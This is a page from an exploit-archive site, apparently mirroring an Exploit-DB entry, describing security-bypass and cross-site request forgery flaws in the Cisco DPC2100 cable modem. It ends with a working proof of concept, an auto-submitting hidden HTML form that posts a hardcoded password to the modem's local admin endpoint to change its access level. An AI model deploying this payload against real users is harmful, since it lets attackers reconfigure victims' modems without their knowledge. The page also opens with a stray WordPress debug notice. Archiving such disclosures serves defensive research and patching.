Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple Security-Bypass and Cross-Site Request-Forgery Vulnerabilities in Cisco DPC2100 - exploit.company
header-logo
Suggest Exploit
vendor:
Cisco DPC2100
by:
Unknown
7.5
CVSS
HIGH
Security-Bypass and Cross-Site Request-Forgery
Unknown
CWE
Product Name: Cisco DPC2100
Affected Version From: Unknown
Affected Version To: 2.0.2.r1256-100324as
Patch Exists: NO
Related CWE: Unknown
CPE: h:cisco:dpc2100
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Multiple Security-Bypass and Cross-Site Request-Forgery Vulnerabilities in Cisco DPC2100

The Cisco DPC2100 modem is prone to multiple security-bypass and cross-site request-forgery vulnerabilities. Successful exploits may allow attackers to run privileged commands, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40346/info

Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. 

<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>